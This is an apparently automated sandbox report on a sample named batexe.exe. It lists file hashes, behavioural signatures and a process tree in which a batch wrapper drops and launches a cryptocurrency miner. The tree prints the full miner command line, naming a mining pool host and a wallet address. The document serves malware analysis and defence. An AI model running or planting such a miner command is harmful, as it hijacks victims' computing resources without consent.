Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
295s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
19/02/2024, 19:07
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 1160 b2e.exe 3252 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3252 cpuminer-sse2.exe 3252 cpuminer-sse2.exe 3252 cpuminer-sse2.exe 3252 cpuminer-sse2.exe 3252 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/1744-8-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1744 wrote to memory of 1160 1744 batexe.exe 72 PID 1744 wrote to memory of 1160 1744 batexe.exe 72 PID 1744 wrote to memory of 1160 1744 batexe.exe 72 PID 1160 wrote to memory of 1640 1160 b2e.exe 86 PID 1160 wrote to memory of 1640 1160 b2e.exe 86 PID 1160 wrote to memory of 1640 1160 b2e.exe 86 PID 1640 wrote to memory of 3252 1640 cmd.exe 89 PID 1640 wrote to memory of 3252 1640 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\594B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5BFB.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3252
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
587KB
MD5fea1c01b23aa64a9ec039112ed7ed8bf
SHA12e4d9e66d1bf77e8cc98f8448a95583d937e1479
SHA256cec04776370255aad7163575583cdcc2ad44bf493a013bf72779b000e4d12f4a
SHA5124b2af6494bc407c92533ee11ec9fe15a03ff9deb7cf4bd8d73c522f9291ac45a4fc743d4fe370b6fcd032303384ff80f9789bc98117ef7567b64f926574bf0bb
-
Filesize
311KB
MD5c25f078d854b6eecafea08422d400be9
SHA1d1fd6dde1ce96d9d271d3ded78e08a05c079460b
SHA2565eb351b2b0126a67614e4a649255ea3fcebb8b8f29966e4ec41b91b28f5e8fa8
SHA512c32a82e23b57c2270078fd1e6819c723c1f270e61e3eae738178898d0d5c5023252b7638ee0753e311fbd955a7e5967a8087917f56e4b4d6728580e462ab35f0
-
Filesize
383KB
MD5a0722090ec22ddd524394dc8a29b881f
SHA19dc74e600c470551f9502e0d2c8d1ab8cefb9d25
SHA25679832d1aaefb4351b534f10e5731790f044bfd367e9a428b1e3b7bae437cc743
SHA5126b0aafcd8e74c5b13adc2a37141730f18dcf67e148601d6b62e18030322834d86af8d618175069d5c24400bd4beaa73f04e9864df03ff70064bb3f7ff1193d89
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
342KB
MD5ef8bd5632886c483d385a61fbd471188
SHA1492d35371807a1c2d45a106a6cdc054c03b68d82
SHA25620721371bfe84a0829c53f675839877dca6b871e794b3cf38db6a2a522921355
SHA51235d55320417832a1f7c7d878068dc39c39859967a3d305c0557ae6e35c77298e629f66f64c33ba5f5d10dad6311dcc6225c427d31f3a6a72c2e07a2afe82c7aa
-
Filesize
333KB
MD5325eddc9f624b8f5b43f95c3fdf1e50c
SHA1b1253f1ac79f179bcae6d6f2dd865005b5f263a9
SHA25646abf0be4bd961acb71f309ea81a1ecf5529175da2dd04492db3f1f44dda90e8
SHA512e8aca9915ef2b842b46a4fa7487ae564b454320002c52e60c1a069f7041ea032cb9a0eb833b64a43b6dafd463d94013f8d3acca4fb8d622e3a5ebdc62c6f734a
-
Filesize
320KB
MD59abc2d6fe180a37b542f3bf99c5d8a02
SHA15e790ae05ec1b186913b623aced47d297624505e
SHA256eb1c9a5381930635bc73148bf8e4110f8d63016c12c2e0fae83250f9c448a355
SHA51214edf6aecd8d06274489862a2c9c3f44e88cf151de58fe80499747a5f702635496a29e290f3e6f09241861024c12a570b20e44367e19326824ed20edb64c98b6
-
Filesize
455KB
MD570da085c27d57f71eb905742c625bac0
SHA1c752c4959659f55f3f97368472af78cb32c3811b
SHA256afed1d669d4bc37657f90f6c5cb95942de9817f0e14aa480fce13baa63605229
SHA5126d0c5cf24488df40331e14ebba10f63f7d43d9399ee427d02cb3d400abaf8ee7c3538a34ce8b6769aaf90c013d6237f579901b20d7bb8c7d79618bff49653a14
-
Filesize
29KB
MD516346bed1eda23c10aedf446308160fd
SHA18f3c2504ecea24d623de72be6a1f3f88ab81c39b
SHA2564b3adf842053b2176220b6d8c772e10f2069cb8c332b26b0d80728d607007b83
SHA5124d0764f8d27dcea55db6d5abffe679af5676c1e636f0bcc044a2898e8dbd4c2de5203b37b84a5825a7c43aa888d60921ec9000ca070f08b83759bd4424f1d07d
-
Filesize
342KB
MD55e927cbf1c58ff2a9e6387b5449a594b
SHA141878ce55789632331c2665529a0a3349c8ed70d
SHA256ee31afeba5011c397cfde20da4417b04ac4893164ca820d94f49e3016876579a
SHA512fb6458232802bd33f8532813ed08065c73cd66ec27d7ca61f51d2f595a854d1120e35ae37d34ee64bf8d936ddbb3ca82d80dfff7fe4aa50a820790019b0e7562
-
Filesize
32KB
MD5b5ee2ecfeb4202d3e8b80c60fe8c98f4
SHA1f4c7678c3241776d53736f224f09d2cd49ec0876
SHA256c8095b7b9c67c5c3106a7469febc09bba50b3a384bfb98bf0fba0a4a22c36844
SHA51217190c52d497237abec71f569306b8f9cc36104ef89f002ab366702892cfae8311a7f4ac5ecb410b173932d3c5f3ebd0b16158d26a0e90c9dc029b3e805db543
-
Filesize
434KB
MD5d9e4de1938ccdb97fb8c64bdc6732248
SHA150906c7ac7f0b4b55d5aa79aadc1c8e62f872094
SHA256bd55e9678c616c987e26a3e026f76def805da213378697d8497ed7c6a94a619f
SHA51218274322fe30feaac75cb73a620691b866a0ece502f81728f018e99c4d7f15e8b600834ad2519b575af132c597b58e14e3bd7e4a6c01d1df431cd0fe179b5491
-
Filesize
149KB
MD531325ee097b2686dd3f7ed3c46dca632
SHA1b0f57a72c2b5d73f2a3b64937f3c442d4c1892b0
SHA256a8695fed44df7301297f77490b02ecb540f18663e0023f9bbe956e9ab1adada8
SHA5120b6b4ebd9c5437aee23455b1aa41814b413a9f8fb6257ddb7984254aa0c2fe6b50bc8829eed15295bce4b0c7476732a8f2f660cb72587f639c29bc63b8cc64f7
-
Filesize
368KB
MD5ef47272543eba722b4d8e902431e4208
SHA1df59be565b9051a17c7c21bf9e50dc5c1dc29078
SHA2568f46f6941285af191a1fe2c89f15c65cdfe3986772245ffa37ed8dabe9c6c8c6
SHA5124c00a1db992be74e6c50793a8cd9a6e7598190f761837553fa7e97403c15ffc232fa3332a93dab9642affaeda472e4ae17cae3ce463041f1a251a11829944e29
-
Filesize
367KB
MD541217be4144b5551c1b2df7e883b01fa
SHA1a8fa0c068233d97656d878d29303b39af2721fbd
SHA256d16b777fa8214b8fa07e483ff5f1fdd808fa7779d0b3904642a36d8dcf4fb688
SHA512e14e8f8e9d2be69ce414c1a9ae01e6257f0b61a7ff07a38c34f541c024b651df1f147cfeb5e14162f8f1a6002b2c0f56f9e868084223faa4e486237ba4c8204a